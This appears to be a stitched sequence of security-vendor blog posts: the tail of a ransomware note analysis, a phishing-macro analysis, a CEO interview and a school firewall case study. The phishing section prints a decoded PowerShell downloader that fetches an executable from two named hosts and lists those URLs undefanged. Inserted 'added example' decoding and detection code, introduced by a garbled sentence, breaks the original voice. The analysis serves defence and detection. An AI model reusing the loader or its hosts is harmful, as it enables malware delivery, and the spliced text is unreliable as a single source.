The ransom note tells the victim that their files are now encrypted and will be deleted if they do not comply, but it gives no clear instructions on how victims can get their files back. After reminding security researchers that this is not another Jigsaw ransomware variant, it starts a countdown and deletes one file every hour.

However, further analysis revealed that the decryption key was easily found in its strings – “PsTqQNhR77oKJXvBWE3YZc”.

Copying this key into the decryption key box starts decrypting all the files. The ransomware then deletes all copies of itself, cleaning up the infected machine.

Because of the prevalence of these types of malware attacks, we urge our users to back up their files regularly.

SonicWall Capture Labs provides protection against this threat via the following signature:

  • GAV: Jigsaw.RSM_26 (Trojan)

New Phishing campaign targets Bank of America Merrill Lynch customers

SonicWall has recently spotted a new Bank of America phishing campaign. The scam email claims to come from Bank of America Merrill Lynch but carries a malicious Excel attachment. The Excel document contains VBA macros which, when enabled, download and run a malicious Win32 Trojan payload.

Infection Cycle:

Phishing email is the most effective attack vector now that exploit kits are no longer the preferred attack mode for hackers. In this phishing campaign, Bank of America Merrill Lynch customers are being targeted with a custom attack. All of these fake emails come from the domain ‘bofamail.com’, not the real ‘bankofamerica.com’. The sender pretends to be a real Bank of America employee; an online profile with the same name exists for someone working at a southern California branch. However, the Newport branch address and phone number in the email do not match.

Upon launching the Excel attachment, a prompt appears with the message “If you have problems viewing/loading document content please select “Enable Editing” and then “Enable Content” button”. Once content is enabled, the macro downloads a malicious payload, which goes into action immediately.

The VBA code is password-locked.

After unlocking the VBA project by tweaking the binary, we see the form (shown below) with encoded values in its fields.

VBA code:

The VBA code is highly obfuscated to avoid static detection through signatures. It contains the logic to retrieve the shell code from the form above.

Shell Code:

The shell code that is retrieved is pasted below. It contains a gzip-compressed, base64-encoded string.

PowerShell:

After decompressing and base64-decoding the shell code above, we get the function below, which downloads the malicious payload from either hxxp://gba-llp.ca/za.liva or hxxp://jamaicabeachpolice.com/za.liva:

# Decoded loader as recovered from the macro; the <# ... #> block comments are obfuscation filler.
function <#release#> tisel([string] $stri1)
{
    $tos1=1;
    try{
        # download the URL in $stri1 to %TEMP%\tmp0281.exe; any failure returns 0
        (new-object system.net.webclient <#exim#> ).downloadfile($stri1,$env:temp+'\tmp0281.exe');
    }
    catch{
        $tos1=0;
    }
    return $tos1;
}

# try each host in turn and stop at the first successful download
$men1=@('gba-llp.ca/za.liva','jamaicabeachpolice.com/za.liva');
foreach ($rix in $men1)
{
    if(tisel('http://'+$rix) -eq 1){
        break;
    }
};

Hence, upon enabling the VBA macro in the Excel document, a shell command is executed which invokes a fileless PowerShell script to download and execute the malicious file.
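The two analyst steps described above, decoding a base64-then-gzip blob back into readable PowerShell and pulling the download targets out of the recovered script, as an added example that is not the campaign's loader or SonicWall's code. The script it decodes is a constructed stand-in with placeholder hosts under example.invalid; the raw-Deflate fallback covers loaders that compress with DeflateStream instead of GZipStream.

```python
import base64
import gzip
import re
import zlib

# Added example. Constructed stand-in for a decoded loader: same array-of-hosts
# shape as the one in the post, but placeholder hosts under example.invalid.
SAMPLE_SCRIPT = (
    "$men1=@('downloader.example.invalid/za.liva','mirror.example.invalid/za.liva');\n"
    "foreach ($rix in $men1) { if(tisel('http://'+$rix) -eq 1){ break; } };\n"
)


def encode_b64_gzip(text):
    """Build a gzip + base64 blob (used here only to construct the sample)."""
    return base64.b64encode(gzip.compress(text.encode("utf-8"))).decode("ascii")


def encode_b64_raw_deflate(text):
    """Build a raw-Deflate + base64 blob, the DeflateStream variant (sample only)."""
    comp = zlib.compressobj(wbits=-zlib.MAX_WBITS)
    raw = comp.compress(text.encode("utf-8")) + comp.flush()
    return base64.b64encode(raw).decode("ascii")


SAMPLE_GZIP_BLOB = encode_b64_gzip(SAMPLE_SCRIPT)
SAMPLE_DEFLATE_BLOB = encode_b64_raw_deflate(SAMPLE_SCRIPT)


def decode_b64_gzip(blob):
    """base64-decode, then gunzip; fall back to raw Deflate when the gzip
    magic bytes (1f 8b) are absent."""
    raw = base64.b64decode(blob)
    if raw[:2] == b"\x1f\x8b":
        data = gzip.decompress(raw)
    else:
        data = zlib.decompress(raw, -zlib.MAX_WBITS)  # raw Deflate, no header
    return data.decode("utf-8")


# 'host/path' literals: the scheme is prepended at run time, so match the bare form.
TARGET_RE = re.compile(r"'([A-Za-z0-9.-]+\.[A-Za-z]{2,}/[^']*)'")


def extract_download_targets(script):
    """Return the host/path strings the decoded loader would fetch, in order."""
    return TARGET_RE.findall(script)


def defanged(target):
    """Write a target as hxxp://host[.]tld/path for safe inclusion in a report."""
    host, _, path = target.partition("/")
    return "hxxp://" + host.replace(".", "[.]") + "/" + path


if __name__ == "__main__":
    script = decode_b64_gzip(SAMPLE_GZIP_BLOB)
    for target in extract_download_targets(script):
        print(defanged(target))
```

The regex deliberately matches the quoted `host/path` form rather than full URLs, because the loader only adds `http://` when it calls the download function; a URL-only pattern would miss both targets.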

The payload exhibits the following behaviors

  • Stops and deletes the Windows Defender service
  • Sets up Task Scheduler to run for every 10 minutes
  • Injects itself into the whitelisted process ‘svchost.exe’
  • Communicates with the C&C server periodically
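The first three behaviors in that list leave traces in standard Windows event logs, which makes them a good basis for detection rules. Below is an added example of such logic, not SonicWall's own detection code: it runs over constructed event records in a simplified "EventID key=value" form (not real output from this sample) and flags a stopped or disabled Windows Defender service, a scheduled task with a repeat interval of ten minutes or less whose command lives under a Temp directory, and svchost.exe started by anything other than services.exe (a common proxy for loaders that launch their own svchost to inject into). The event IDs 7036 and 7040 (Service Control Manager), 4698 (scheduled task created) and 4688 (process creation) are real; the field names are this example's own.

```python
"""Flag the post-infection behaviours listed above in Windows event records.

Added example, not SonicWall's detection logic. The events are constructed
here in a simplified "EventID key=value ..." form; they are not real output
from the sample. Event IDs used: 7036/7040 (Service Control Manager),
4698 (scheduled task created), 4688 (process creation).
"""
import re

# Constructed sample events (raw string so the Windows paths keep their backslashes).
SAMPLE_EVENTS = r"""
7036 service=WinDefend state=stopped
7040 service=WinDefend start_type=disabled
4698 task=\Microsoft\Windows\UpdateCheck interval=PT10M command=C:\Users\u\AppData\Local\Temp\tmp0281.exe
4688 process=C:\Windows\System32\svchost.exe parent=C:\Users\u\AppData\Local\Temp\tmp0281.exe
4688 process=C:\Windows\System32\svchost.exe parent=C:\Windows\System32\services.exe
4698 task=\Microsoft\Windows\Backup interval=P1D command=C:\Windows\System32\wbadmin.exe
"""

TEMP_PATH_RE = re.compile(r"\\Temp\\", re.IGNORECASE)
ISO_MINUTES_RE = re.compile(r"^PT(\d+)M$")  # ISO 8601 duration, minutes only
SHORT_INTERVAL_MINUTES = 10  # the sample re-runs itself every 10 minutes


def parse_event(line: str) -> dict:
    """Parse one constructed 'EventID key=value ...' line into a dict."""
    parts = line.split()
    fields = {"event_id": int(parts[0])}
    for kv in parts[1:]:
        key, _, value = kv.partition("=")
        fields[key] = value
    return fields


def detect(events_text: str) -> list:
    """Return (rule_name, line) pairs for lines matching the sample's behaviours."""
    findings = []
    for line in events_text.splitlines():
        if not line.strip():
            continue
        ev = parse_event(line)
        eid = ev["event_id"]
        # Behaviour 1: Windows Defender service stopped or disabled.
        if eid == 7036 and ev.get("service") == "WinDefend" and ev.get("state") == "stopped":
            findings.append(("defender_service_stopped", line))
        elif eid == 7040 and ev.get("service") == "WinDefend" and ev.get("start_type") == "disabled":
            findings.append(("defender_service_disabled", line))
        # Behaviour 2: a scheduled task with a short repeat interval running from %TEMP%.
        elif eid == 4698:
            m = ISO_MINUTES_RE.match(ev.get("interval", ""))
            if m and int(m.group(1)) <= SHORT_INTERVAL_MINUTES and TEMP_PATH_RE.search(ev.get("command", "")):
                findings.append(("short_interval_task_from_temp", line))
        # Behaviour 3 (heuristic for injection into svchost.exe): svchost.exe started by
        # anything other than services.exe, its legitimate parent.
        elif eid == 4688 and ev.get("process", "").lower().endswith("\\svchost.exe"):
            if not ev.get("parent", "").lower().endswith("\\services.exe"):
                findings.append(("svchost_unusual_parent", line))
    return findings


if __name__ == "__main__":
    for rule, line in detect(SAMPLE_EVENTS):
        print(f"{rule:32} {line}")
```

On the constructed input, the two benign records (svchost.exe under services.exe, and a daily backup task from System32) are left alone while the four malicious ones are flagged. Real deployments would feed these rules from the Security and System event channels rather than from text lines, but the conditions are the same.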

Threat Graph:

The SonicWall Capture Labs Threat Research team provides protection against this threat with the following signatures:

  • GAV: Downloader.HWB (Trojan)
  • GAV: MalAgent.H_13330 (Trojan)

Hashes:

Email:
fed01a32dab1e3ab1eba4b2bfa542219a63b0777608717ad0ba5c5e0c66ec928
336cc2145bc27105906023089264593dcf9ddc99bb4a61af6760920efa97a6f4
f5e923ee210a88c6f02eac9c66ec116e49c964b6e6402124ed02462c69f46e0f
d0582f03ea259bc4d33aa77942b7a4d4ce8163e022ede4dcea9c81d802910321

Excel:
f22c2f747d77d57c14f6e81433691bd1b79f0fde1e111b4c4a90aac278b23654

Payload:
32c58040d3d6ec5305a1a0ebb48ba05aebe3ac2f905a7f152f32fc9170e16711

Payload Url:
http://gba-llp.ca/za.liva
http://jamaicabeachpolice.com/za.liva

Bill Conner: How the UK Is Taking Malware Seriously

Bill Conner sat down with Information Age editor Nick Ismail to discuss global malware attack statistics, cross-border cybersecurity collaboration, the increasing need to inspect PDFs and Microsoft Office documents, and how all of these affect the dynamic U.K. political landscape.

Though malware attack data shows an increase in global attacks, the U.K. has experienced a decrease in these attacks following the WannaCry ransomware strain in previous years.

Conner sees this as a positive change for the U.K. and stated via Information Age, “you guys were all over it” following the WannaCry attack and “most of the vendors in the U.K. and their customers put solutions in place to protect against multiple family variants of ransomware.”

While this is a positive change for the U.K., there is still work to be done globally and Conner says regardless of the often divided political climate, “there’s a good foundation for cyber collaboration across borders.”

“Right now, we need to focus on those PDFs and Office (files), the things you run in your business every day, because they can be exploited for IP and monetary gain. And you can’t even see it.”

Bill Conner
SonicWall President & CEO

In addition to urging governments to look toward political collaboration to tighten cybersecurity globally, Conner explained the majority of this change will come through the dedication of law enforcement.

“Law enforcement sharing is better than political sharing at the moment,” Conner told Information Age. “Public institutions, private organizations and different governments have got to collaborate. But, above all, we’ve got to have dedicated cyber law enforcement.”

While a global cybersecurity strategy may be down the road, Conner says there are places to focus on now to best secure governments, enterprises and SMBs.

What does Conner recommend an organization focus their cybersecurity strategy on?

“What I’m telling governments and enterprises is to forget side-channel exploits for the moment,” he said. “Right now, we need to focus on those PDFs and Office (files), the things you run in your business every day.”

One way to mitigate these specific malware threats is advanced technology, like SonicWall Capture Advanced Threat Protection (ATP) with SonicWall Real-Time Deep Memory Inspection (RTDMI™), which inspects and mitigates attacks in memory.

Read the rest of Conner’s recommendations and predictions in his interview with Information Age.

Network Security for K-12 School District Simplified with Powerful Firewall, Failover Capabilities

The Goffstown School District in New Hampshire supports nearly 4,000 students and staff. And one person oversees it all.

Running the IT department for an entire K-12 school district sounds like a challenge that few would take, but Goffstown School District IT director Gary Girolimon makes it look easy. Clearly, this is the result of years of experience and having sound networking tools available.

If the number of users doesn’t bother you, consider that all seven Goffstown School District buildings are part of a high-speed 10 Gbps dark fiber wide-area network (WAN). At any given time of day, students can be downloading massive amounts of dangerous files, or stumbling upon harmful content that violates compliance regulations.

So, how do they handle that level of network complexity?

Girolimon deployed a SonicWall SuperMassive 9200 high-end firewall at the perimeter of his network. On it, he runs the SonicWall Comprehensive Gateway Security Suite, including content filtering to support CIPA compliance, which helps him manage bandwidth for demanding applications and block harmful sites. The district also uses SonicWall Analyzer for real-time web traffic reporting.

“SonicWall gives us an integrated, cost-effective solution for our organization’s security needs,” said Girolimon. “It’s easy to administer, with a flexible UI, and the solution is super reliable. We have had no downtime attributable to our SonicWall firewall.”

Prior to deploying the SuperMassive at the edge, Girolimon deployed smaller SonicWall firewalls, ranging from NSA 2400s to 3600s, at each distributed building location. Those firewalls now provide failover service in case a dark fiber link to the network hub goes down, thereby extending their life and usefulness.

“SonicWall gives us an integrated, cost-effective solution for our organization’s security needs. It’s easy to administer, with a flexible UI, and the solution is super reliable.”

Gary Girolimon
IT Director
Goffstown School District

This flexibility and performance have allowed Girolimon to create a DMZ and bring servers in-house for better local access and to provide specific employees remote access to network assets — all with the confidence they are secure and protected.

By maintaining a single, primary firewall appliance with a failover firewall available as needed, Girolimon greatly simplified administration of firewall rules, app policies and VPN permissions. Integrated content filtering and VPN have simplified CIPA compliance.

Cost-Effective Network Security for K-12 School Districts

Today, more than 3,000 districts and schools rely on SonicWall to deliver secure remote and network access with school firewalls that enable educational institutions to realize the promise of technologically savvy learning environments, in the classroom or while students are mobile.